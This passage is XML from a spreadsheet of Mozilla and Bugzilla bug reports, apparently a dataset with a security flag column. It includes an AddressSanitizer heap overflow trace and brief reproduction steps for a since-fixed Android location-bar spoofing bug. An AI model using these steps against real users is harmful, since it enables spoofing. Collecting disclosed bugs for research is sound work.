    #4 0x7f365c3e994a in CreateCompositorThread /builds/worker/workspace/build/src/gfx/layers/ipc/CompositorThread.cpp:102:26
    #5 0x7f365c3e994a in mozilla::layers::CompositorThreadHolder::CompositorThreadHolder() /builds/worker/workspace/build/src/gfx/layers/ipc/CompositorThread.cpp:52
    #6 0x7f365c3e9c03 in mozilla::layers::CompositorThreadHolder::Start() /builds/worker/workspace/build/src/gfx/layers/ipc/CompositorThread.cpp:124:33
    #7 0x7f365c4b9322 in gfxPlatform::InitLayersIPC() /builds/worker/workspace/build/src/gfx/thebes/gfxPlatform.cpp:1038:5
    #8 0x7f365c4b5037 in gfxPlatform::Init() /builds/worker/workspace/build/src/gfx/thebes/gfxPlatform.cpp:774:5
    #9 0x7f365c4b242b in gfxPlatform::GetPlatform() /builds/worker/workspace/build/src/gfx/thebes/gfxPlatform.cpp:533:9
    #10 0x7f3661c0b54e in CreateVsyncRefreshTimer /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1023:5
    #11 0x7f3661c0b54e in nsRefreshDriver::ChooseTimer() const /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1139
    #12 0x7f3661c0e631 in nsRefreshDriver::EnsureTimerStarted(nsRefreshDriver::EnsureTimerStartedFlags) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1375:34
    #13 0x7f3661e02536 in ObserveStyleFlushes /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:654:7
    #14 0x7f3661e02536 in EnsureStyleFlush /builds/worker/workspace/build/src/layout/base/nsIPresShellInlines.h:50
    #15 0x7f3661e02536 in nsPresContext::MediaFeatureValuesChanged(mozilla::MediaFeatureChange const&amp;) /builds/worker/workspace/build/src/layout/base/nsPresContext.h:297
    #16 0x7f3661d5f576 in SetVisibleArea /builds/worker/workspace/build/src/layout/base/nsPresContext.h:473:9
    #17 0x7f3661d5f576 in nsDocumentViewer::InitPresentationStuff(bool) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:721
    #18 0x7f3661d5e950 in nsDocumentViewer::InitInternal(nsIWidget*, nsISupports*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, bool, bool, bool) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:944:10
    #19 0x7f3661d5da27 in nsDocumentViewer::Init(nsIWidget*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:664:10
    #20 0x7f3664f1557f in nsDocShell::SetupNewViewer(nsIContentViewer*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:9096:7
    #21 0x7f3664f13eeb in nsDocShell::Embed(nsIContentViewer*, char const*, nsISupports*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6903:17
    #22 0x7f3664f22546 in nsDocShell::CreateAboutBlankContentViewer(nsIPrincipal*, nsIURI*, bool, bool) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7784:14
    #23 0x7f3664fa494f in nsWebShellWindow::Initialize(nsIXULWindow*, nsIXULWindow*, nsIURI*, int, int, bool, nsITabParent*, mozIDOMWindowProxy*, nsWidgetInitData&amp;) /builds/worker/workspace/build/src/xpfe/appshell/nsWebShellWindow.cpp:237:21
    #24 0x7f3664f9f1c1 in nsAppShellService::JustCreateTopWindow(nsIXULWindow*, nsIURI*, unsigned int, int, int, bool, nsITabParent*, mozIDOMWindowProxy*, nsWebShellWindow**) /builds/worker/workspace/build/src/xpfe/appshell/nsAppShellService.cpp:736:25
    #25 0x7f3664fa0a3a in nsAppShellService::CreateTopLevelWindow(nsIXULWindow*, nsIURI*, unsigned int, int, int, nsITabParent*, mozIDOMWindowProxy*, nsIXULWindow**) /builds/worker/workspace/build/src/xpfe/appshell/nsAppShellService.cpp:200:8
    #26 0x7f366577d6af in nsAppStartup::CreateChromeWindow2(nsIWebBrowserChrome*, unsigned int, nsITabParent*, mozIDOMWindowProxy*, unsigned long, bool*, nsIWebBrowserChrome**) /builds/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:680:15
    #27 0x7f36658ee907 in nsWindowWatcher::CreateChromeWindow(nsTSubstring&lt;char&gt; const&amp;, nsIWebBrowserChrome*, unsigned int, nsITabParent*, mozIDOMWindowProxy*, unsigned long, nsIWebBrowserChrome**) /builds/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:469:21
    #28 0x7f36658ec3db in nsWindowWatcher::OpenWindowInternal(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, bool, bool, nsIDocShellLoadInfo*, mozIDOMWindowProxy**) /builds/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:939:14
    #29 0x7f36658e6b8f in nsWindowWatcher::OpenWindow(mozIDOMWindowProxy*, char const*, char const*, char const*, nsISupports*, mozIDOMWindowProxy**) /builds/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:328:10
    #30 0x7f3659b87701 in NS_InvokeByIndex /builds/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:106
    #31 0x7f365b48c90e in Invoke /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1951:12
    #32 0x7f365b48c90e in Call /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1267
    #33 0x7f365b48c90e in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1234
    #34 0x7f365b4935a8 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:911:12
    #35 0x7f3665c74757 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:290:15
    #36 0x7f3665c74757 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:467
    #37 0x7f3665c5f211 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:12
    #38 0x7f3665c5f211 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3084
    #39 0x7f3665c4565a in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:417:12
    #40 0x7f3665c77bf4 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:700:15
    #41 0x7f3665d161af in ExecuteInExtensibleLexicalEnvironment(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::Handle&lt;JSObject*&gt;) /builds/worker/workspace/build/src/js/src/builtin/Eval.cpp:460:12
    #42 0x7f3665d16e4f in js::ExecuteInJSMEnvironment(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::Handle&lt;JSObject*&gt;, JS::AutoVector&lt;JSObject*&gt;&amp;) /builds/worker/workspace/build/src/js/src/builtin/Eval.cpp:546:12
    #43 0x7f3665d16a53 in js::ExecuteInJSMEnvironment(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::Handle&lt;JSObject*&gt;) /builds/worker/workspace/build/src/js/src/builtin/Eval.cpp:504:12
    #44 0x7f365b36ee37 in mozJSComponentLoader::ObjectForLocation(ComponentLoaderInfo&amp;, nsIFile*, JS::MutableHandle&lt;JSObject*&gt;, JS::MutableHandle&lt;JSScript*&gt;, char**, bool, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/xpconnect/loader/mozJSComponentLoader.cpp:925:25
    #45 0x7f365b36c362 in mozJSComponentLoader::LoadModule(mozilla::FileLocation&amp;) /builds/worker/workspace/build/src/js/xpconnect/loader/mozJSComponentLoader.cpp:442:10
    #46 0x7f3659b09e29 in Load /builds/worker/workspace/build/src/xpcom/components/nsComponentManager.cpp:717:24
    #47 0x7f3659b09e29 in nsFactoryEntry::GetFactory() /builds/worker/workspace/build/src/xpcom/components/nsComponentManager.cpp:1748
    #48 0x7f3659b0aaba in nsComponentManagerImpl::CreateInstanceByContractID(char const*, nsISupports*, nsID const&amp;, void**) /builds/worker/workspace/build/src/xpcom/components/nsComponentManager.cpp:1046:41
    #49 0x7f3659b020cd in nsComponentManagerImpl::GetServiceByContractID(char const*, nsID const&amp;, void**) /builds/worker/workspace/build/src/xpcom/components/nsComponentManager.cpp:1409:10
    #50 0x7f3659b10b15 in CallGetService /builds/worker/workspace/build/src/xpcom/components/nsComponentManagerUtils.cpp:67:43
    #51 0x7f3659b10b15 in nsGetServiceByContractIDWithError::operator()(nsID const&amp;, void**) const /builds/worker/workspace/build/src/xpcom/components/nsComponentManagerUtils.cpp:292
    #52 0x7f36599cc69a in nsCOMPtr_base::assign_from_gs_contractid_with_error(nsGetServiceByContractIDWithError const&amp;, nsID const&amp;) /builds/worker/workspace/build/src/xpcom/base/nsCOMPtr.cpp:106:7
    #53 0x7f3665993e98 in operator= /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:1036:5
    #54 0x7f3665993e98 in nsAppStartupNotifier::Observe(nsISupports*, char const*, char16_t const*) /builds/worker/workspace/build/src/toolkit/xre/nsAppStartupNotifier.cpp:59
    #55 0x7f3665985e88 in XREMain::XRE_mainRun() /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4664:22
    #56 0x7f366598970d in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4979:8
    #57 0x7f366598abd4 in XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:5071:21
    #58 0x4f4ef5 in do_main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:231:22
    #59 0x4f4ef5 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:304
    #60 0x7f367a7c51c0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x211c0)
SUMMARY: AddressSanitizer: heap-buffer-overflow /builds/worker/workspace/build/src/gfx/2d/ssse3-scaler.c:202:16 in ssse3_fetch_horizontal
Shadow bytes around the buggy address:
 </t>
        </is>
      </c>
      <c r="X2401" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2402">
      <c r="A2402" t="n">
        <v>1149000</v>
      </c>
      <c r="B2402" t="inlineStr">
        <is>
          <t>2015-03-29 19:20:43 -0700</t>
        </is>
      </c>
      <c r="C2402" t="inlineStr">
        <is>
          <t>Killing the Location bar using fullscreen mode and alert function on another tab (spoofing risk)</t>
        </is>
      </c>
      <c r="D2402" t="inlineStr">
        <is>
          <t>2024-05-30 08:59:47 -0700</t>
        </is>
      </c>
      <c r="E2402" t="n">
        <v>1</v>
      </c>
      <c r="F2402" t="n">
        <v>1</v>
      </c>
      <c r="G2402" t="n">
        <v>6</v>
      </c>
      <c r="H2402" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2402" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J2402" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2402" t="inlineStr">
        <is>
          <t>39 Branch</t>
        </is>
      </c>
      <c r="L2402" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M2402" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N2402" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2402" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2402" t="inlineStr">
        <is>
          <t>[adv-main42+]</t>
        </is>
      </c>
      <c r="Q2402" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2402" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2402" t="inlineStr">
        <is>
          <t>Firefox 43</t>
        </is>
      </c>
      <c r="T2402" t="n">
        <v>1</v>
      </c>
      <c r="U2402" t="n">
        <v>0</v>
      </c>
      <c r="V2402" t="n">
        <v>33</v>
      </c>
      <c r="W2402" t="inlineStr">
        <is>
          <t>Created attachment 8585252
TESTCASE1.html
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0
Build ID: 20150320202338
Steps to reproduce:
When you go on the fullscreen mode and an alert() function on another tab, exits the fullscreen mode, the location bar has disappeared.
1 : go on http://www.alternativ-testing.fr/Research/Mozilla/android/firefox37androidspoof/testfs.html and click on the first link (a data: link will be opened on another tab
2 : an alert() will redirect you on the previous tab ( on http://www.alternativ-testing.fr/Research/Mozilla/android/firefox37androidspoof/testfs.html ) , now click on the second link (before 10 seconds) and wait.
Actual results:
An alert will redirect you on the data: link and exits the fullscreen mode , now the location bar is invisible ! (even if you try to press the back button on android , the location bar has disappeared for always)
you ca use now a fake location bar (leading to a Location Bar Spoofing)
Expected results:
After all these steps, you can use a fake location bar (leading to a Location Bar Spoofing).</t>
        </is>
      </c>
      <c r="X2402" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2403">
      <c r="A2403" t="n">
        <v>102141</v>
      </c>
      <c r="B2403" t="inlineStr">
        <is>
          <t>2001-09-28 07:24:19 -0700</t>
        </is>
      </c>
      <c r="C2403" t="inlineStr">
        <is>
          <t>[security] When changing a bug the Product: list has options the user doesn't have access to.</t>
        </is>
      </c>
      <c r="D2403" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:26 -0800</t>
        </is>
      </c>
      <c r="E2403" t="n">
        <v>1</v>
      </c>
      <c r="F2403" t="n">
        <v>1</v>
      </c>
      <c r="G2403" t="n">
        <v>4</v>
      </c>
      <c r="H2403" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2403" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2403" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K2403" t="inlineStr">
        <is>
          <t>2.14</t>
        </is>
      </c>
      <c r="L2403" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2403" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2403" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2403" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2403" t="inlineStr">
        <is>
          <t>applied to 2.14.1</t>
        </is>
      </c>
      <c r="Q2403" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2403" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2403" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T2403" t="n">
        <v>1</v>
      </c>
      <c r="U2403" t="n">
        <v>0</v>
      </c>
      <c r="V2403" t="n">
        <v>25</v>
      </c>
      <c r="W2403" t="inlineStr">
        <is>
          <t>If a bug is created in the product Foo, a user with Foo Bug Access will be able 
to see other products in the Product pulldown menu in show_bug.cgi.  I can 
reproduce it by doing the following:
1. Create a user Alice who has only Foo Bugs Access, and no other permissions 
checked.
2. Alice submits a bug for the Foo product.
3. Alice views the bug at show_bug.cgi
4. Alice selects the Product pulldown menu (normally used to change which 
product a bug belongs to) and sees that products Bar and Baz also exist.
Instead, Bugzilla should only display products that Alice has access to.  In 
this case the only Foo should be displayed.</t>
        </is>
      </c>
      <c r="X2403" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2404">
      <c r="A2404" t="n">
        <v>505160</v>
      </c>
      <c r="B2404" t="inlineStr">
        <is>
          <t>2009-07-19 19:45:52 -0700</t>
        </is>
      </c>
      <c r="C2404" t="inlineStr">
        <is>
          <t>Tumblr bookmarklet does not work with Jetpack enabled.</t>
        </is>
      </c>
      <c r="D2404" t="inlineStr">
        <is>
          <t>2009-08-18 09:43:05 -0700</t>
        </is>
      </c>
      <c r="E2404" t="n">
        <v>1</v>
      </c>
      <c r="F2404" t="n">
        <v>1</v>
      </c>
      <c r="G2404" t="n">
        <v>6</v>
      </c>
      <c r="H2404" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2404" t="inlineStr">
        <is>
          <t>Mozilla Labs</t>
        </is>
      </c>
      <c r="J2404" t="inlineStr">
        <is>
          <t>Jetpack Prototype</t>
        </is>
      </c>
      <c r="K2404" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2404" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2404" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2404" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2404" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2404" t="inlineStr"/>
      <c r="Q2404" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2404" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2404" t="inlineStr">
        <is>
          <t>0.5</t>
        </is>
      </c>
      <c r="T2404" t="n">
        <v>0</v>
      </c>
      <c r="U2404" t="n">
        <v>0</v>
      </c>
      <c r="V2404" t="n">
        <v>8</v>
      </c>
      <c r="W2404" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)
The Tumblr bookmarklet http://bit.ly/BzNs will not load when Jetpack is enabled.
Reproducible: Always
Steps to Reproduce:
1.Enable Jetpack.
2.Select text etc for posting via bookmarklet.
3.Click bookmarklet.
Actual Results:  
1.JavaScript pop-up opens, appears to connect to tumbler but remains blank.
Expected Results:  
Should contain quick posting dialog.
When Jetpack is disabled, the bookmarklet works correctly on browser restart.</t>
        </is>
      </c>
      <c r="X2404" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2405">
      <c r="A2405" t="n">
        <v>192196</v>
      </c>
      <c r="B2405" t="inlineStr">
        <is>
          <t>2003-02-06 20:07:31 -0800</t>
        </is>
      </c>
      <c r="C2405" t="inlineStr">
        <is>
          <t>crashes on shutdown</t>
        </is>
      </c>
      <c r="D2405" t="inlineStr">
        <is>
          <t>2011-08-05 21:27:40 -0700</t>
        </is>
      </c>
      <c r="E2405" t="n">
        <v>1</v>
      </c>
      <c r="F2405" t="n">
        <v>1</v>
      </c>
      <c r="G2405" t="n">
        <v>3</v>
      </c>
      <c r="H2405" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2405" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2405" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K2405" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2405" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2405" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2405" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2405" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2405" t="inlineStr"/>
      <c r="Q2405" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2405" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2405" t="inlineStr">
        <is>
          <t>mozilla1.3beta</t>
        </is>
      </c>
      <c r="T2405" t="n">
        <v>1</v>
      </c>
      <c r="U2405" t="n">
        <v>0</v>
      </c>
      <c r="V2405" t="n">
        <v>15</v>
      </c>
      <c r="W2405" t="inlineStr">
        <is>
          <t>All of a sudden, I'm getting tons of crashes on shutdown.  This is just in the
last day or so.  The stack is munged, and looks something like this:
#1543 0x4020511a in nsInputStreamReadyEvent::Release (this=0x455c6b80)
    at ../../../mozilla/xpcom/io/nsStreamUtils.cpp:113
#1544 0x40259b0c in nsCOMPtr_base::~nsCOMPtr_base (this=0x4125f1ac, 
    __in_chrg=0) at ../../../mozilla/xpcom/glue/nsCOMPtr.cpp:64
#1545 0x40205d23 in nsInputStreamReadyEvent::~nsInputStreamReadyEvent (
    this=0x455c6afc, __in_chrg=3)
    at ../../../mozilla/xpcom/io/nsStreamUtils.cpp:55
#1546 0x4020511a in nsInputStreamReadyEvent::Release (this=0x455c6ac8)
    at ../../../mozilla/xpcom/io/nsStreamUtils.cpp:113
#1547 0x40259b0c in nsCOMPtr_base::~nsCOMPtr_base (this=0x4125f23c, 
    __in_chrg=0) at ../../../mozilla/xpcom/glue/nsCOMPtr.cpp:64
#1548 0x40205d23 in nsInputStreamReadyEvent::~nsInputStreamReadyEvent (
    this=0x455c6a44, __in_chrg=3)</t>
        </is>
      </c>
      <c r="X2405" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2406">
      <c r="A2406" t="n">
        <v>832773</v>
      </c>
      <c r="B2406" t="inlineStr">
        <is>
          <t>2013-01-20 11:25:55 -0800</t>
        </is>
      </c>
      <c r="C2406" t="inlineStr">
        <is>
          <t>Unable to send tab to devices; send button greyed out</t>
        </is>
      </c>
      <c r="D2406" t="inlineStr">
        <is>
          <t>2020-12-21 10:30:39 -0800</t>
        </is>
      </c>
      <c r="E2406" t="n">
        <v>1</v>
      </c>
      <c r="F2406" t="n">
        <v>1</v>
      </c>
      <c r="G2406" t="n">
        <v>6</v>
      </c>
      <c r="H2406" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2406" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J2406" t="inlineStr">
        <is>
          <t>Android Sync</t>
        </is>
      </c>
      <c r="K2406" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2406" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M2406" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N2406" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2406" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2406" t="inlineStr"/>
      <c r="Q2406" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2406" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2406" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T2406" t="n">
        <v>1</v>
      </c>
      <c r="U2406" t="n">
        <v>0</v>
      </c>
      <c r="V2406" t="n">
        <v>13</v>
      </c>
      <c r="W2406" t="inlineStr">
        <is>
          <t>Created attachment 704338
Nightly (01/20) - Screenshot
Galaxy Note II; not sure why but the 'Send' button is greyed out regardless of device selection; see screenshot
--
Nightly (01/20)
Samsung Galaxy Note II (Android 4.1)</t>
        </is>
      </c>
      <c r="X2406" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2407">
      <c r="A2407" t="n">
        <v>481955</v>
      </c>
      <c r="B2407" t="inlineStr">
        <is>
          <t>2009-03-06 15:00:44 -0800</t>
        </is>
      </c>
      <c r="C2407" t="inlineStr">
        <is>
          <t>Crash [@ nsGlobalWindow::ResumeTimeouts]</t>
        </is>
      </c>
      <c r="D2407" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E2407" t="n">
        <v>1</v>
      </c>
      <c r="F2407" t="n">
        <v>1</v>
      </c>
      <c r="G2407" t="n">
        <v>3</v>
      </c>
      <c r="H2407" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2407" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2407" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2407" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2407" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2407" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2407" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2407" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2407" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q2407" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2407" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2407" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T2407" t="n">
        <v>1</v>
      </c>
      <c r="U2407" t="n">
        <v>0</v>
      </c>
      <c r="V2407" t="n">
        <v>14</v>
      </c>
      <c r="W2407" t="inlineStr">
        <is>
          <t>Created attachment 366021
stack trace
Loading http://www.beyondspaceandtime.org/FCBSTWeb/web/index.html triggers a scary crash in nsGlobalWindow::ResumeTimeouts.</t>
        </is>
      </c>
      <c r="X2407" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2408">
      <c r="A2408" t="n">
        <v>934222</v>
      </c>
      <c r="B2408" t="inlineStr">
        <is>
          <t>2013-11-03 04:40:43 -0800</t>
        </is>
      </c>
      <c r="C2408" t="inlineStr">
        <is>
          <t>Ban qcdrtdrt@sharklasers.com immediately</t>
        </is>
      </c>
      <c r="D2408" t="inlineStr">
        <is>
          <t>2013-11-03 05:21:32 -0800</t>
        </is>
      </c>
      <c r="E2408" t="n">
        <v>1</v>
      </c>
      <c r="F2408" t="n">
        <v>1</v>
      </c>
      <c r="G2408" t="n">
        <v>7</v>
      </c>
      <c r="H2408" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2408" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J2408" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K2408" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L2408" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2408" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2408" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2408" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2408" t="inlineStr"/>
      <c r="Q2408" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2408" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2408" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2408" t="n">
        <v>1</v>
      </c>
      <c r="U2408" t="n">
        <v>0</v>
      </c>
      <c r="V2408" t="n">
        <v>4</v>
      </c>
      <c r="W2408" t="inlineStr">
        <is>
          <t>The guy whose login is qcdrtdrt@sharklasers.com is spamming bmo for one hour now:
https://bugzilla.mozilla.org/page.cgi?id=user_activity.html&amp;action=run&amp;from=-14d&amp;who=qcdrtdrt%40sharklasers.com
Please ban this account immediately.</t>
        </is>
      </c>
      <c r="X2408" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2409">
      <c r="A2409" t="n">
        <v>49063</v>
      </c>
      <c r="B2409" t="inlineStr">
        <is>
          <t>2000-08-15 11:38:34 -0700</t>
        </is>
      </c>
      <c r="C2409" t="inlineStr">
        <is>
          <t>no sanity checking when setting duplicate</t>
        </is>
      </c>
      <c r="D2409" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:22 -0800</t>
        </is>
      </c>
      <c r="E2409" t="n">
        <v>1</v>
      </c>
      <c r="F2409" t="n">
        <v>1</v>
      </c>
      <c r="G2409" t="n">
        <v>4</v>
      </c>
      <c r="H2409" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2409" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2409" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K2409" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2409" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2409" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2409" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2409" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2409" t="inlineStr">
        <is>
          <t>2.12</t>
        </is>
      </c>
      <c r="Q2409" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2409" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2409" t="inlineStr">
        <is>
          <t>Bugzilla 2.12</t>
        </is>
      </c>
      <c r="T2409" t="n">
        <v>1</v>
      </c>
